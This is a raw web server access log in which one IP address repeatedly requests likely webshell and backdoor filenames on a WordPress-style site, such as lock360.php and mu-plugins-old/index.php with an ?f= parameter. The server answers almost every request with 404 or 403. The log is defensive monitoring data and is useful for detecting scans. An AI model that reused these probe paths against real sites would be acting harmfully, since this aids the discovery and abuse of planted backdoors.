149.202.15.196 - - [12/Feb/2022:10:56:58 -0700] "GET /wp-admin/style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 708 
149.202.15.196 - - [12/Feb/2022:10:56:59 -0700] "GET /s_e.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 2632 
149.202.15.196 - - [12/Feb/2022:10:57:02 -0700] "GET /s_ne.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1471 
149.202.15.196 - - [12/Feb/2022:10:57:04 -0700] "GET /1index.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:10:57:06 -0700] "GET /3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:10:57:10 -0700] "GET /wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:10:57:15 -0700] "GET /wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 301 - "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:10:57:19 -0700] "GET /wp-content/mu-plugins-old/?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:10:57:26 -0700] "GET /radio.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 7718 
149.202.15.196 - - [12/Feb/2022:10:57:34 -0700] "GET /lock360.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1966 
149.202.15.196 - - [12/Feb/2022:10:57:37 -0700] "GET /wp-load.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 5243 
149.202.15.196 - - [12/Feb/2022:10:57:42 -0700] "GET /old-index.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 5146 
149.202.15.196 - - [12/Feb/2022:10:57:48 -0700] "GET /xmrlpc.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 3254 
149.202.15.196 - - [12/Feb/2022:10:57:52 -0700] "GET /xmlrpcs.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 3289 
149.202.15.196 - - [12/Feb/2022:10:57:56 -0700] "GET /wp-admin.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1514 
149.202.15.196 - - [12/Feb/2022:11:04:38 -0700] "GET /wp-load.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:11:04:53 -0700] "GET /style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 12354 
149.202.15.196 - - [12/Feb/2022:11:05:06 -0700] "GET /wp-admin/style.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 15469 
149.202.15.196 - - [12/Feb/2022:11:05:21 -0700] "GET /s_e.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 6218 
149.202.15.196 - - [12/Feb/2022:11:05:28 -0700] "GET /s_ne.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 7041 
149.202.15.196 - - [12/Feb/2022:11:05:35 -0700] "GET /1index.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:11:05:39 -0700] "GET /3index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:11:05:42 -0700] "GET /wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:11:05:47 -0700] "GET /wp-content/mu-plugins-old/index.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 301 - "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:11:05:49 -0700] "GET /wp-content/mu-plugins-old/?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:11:05:53 -0700] "GET /radio.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 2474 
149.202.15.196 - - [12/Feb/2022:11:05:55 -0700] "GET /lock360.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 6082 
149.202.15.196 - - [12/Feb/2022:11:06:02 -0700] "GET /wp-load.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 7431 
149.202.15.196 - - [12/Feb/2022:11:06:10 -0700] "GET /old-index.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 2985 
149.202.15.196 - - [12/Feb/2022:11:06:14 -0700] "GET /xmrlpc.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 3159 
149.202.15.196 - - [12/Feb/2022:11:06:17 -0700] "GET /xmlrpcs.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 4270 
149.202.15.196 - - [12/Feb/2022:11:06:22 -0700] "GET /wp-admin.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 3726 
149.202.15.196 - - [12/Feb/2022:11:06:26 -0700] "GET /qindex.php?daksldlkdsadas=1 HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 4465 
149.202.15.196 - - [12/Feb/2022:11:06:31 -0700] "GET /doc.php HTTP/1.1" 404 106669 "www.bing.com" "wp_is_mobile" 1796 
149.202.15.196 - - [12/Feb/2022:11:06:33 -0700] "GET /wp_wrong_datlib.php HTTP/1.1" 404 106669 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:11:06:36 -0700] "GET /beence.php HTTP/1.1" 403 5 "www.bing.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
149.202.15.196 - - [12/Feb/2022:11:06:39 -0700] "GET /ups.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 987 
149.202.15.196 - - [12/Feb/2022:11:06:40 -0700] "GET /wp-signin.php?dizo&ping HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 1884 
149.202.15.196 - - [12/Feb/2022:11:06:42 -0700] "GET /media-admin.php HTTP/1.1" 403 5 "www.bing.com" "wp_is_mobile" 3533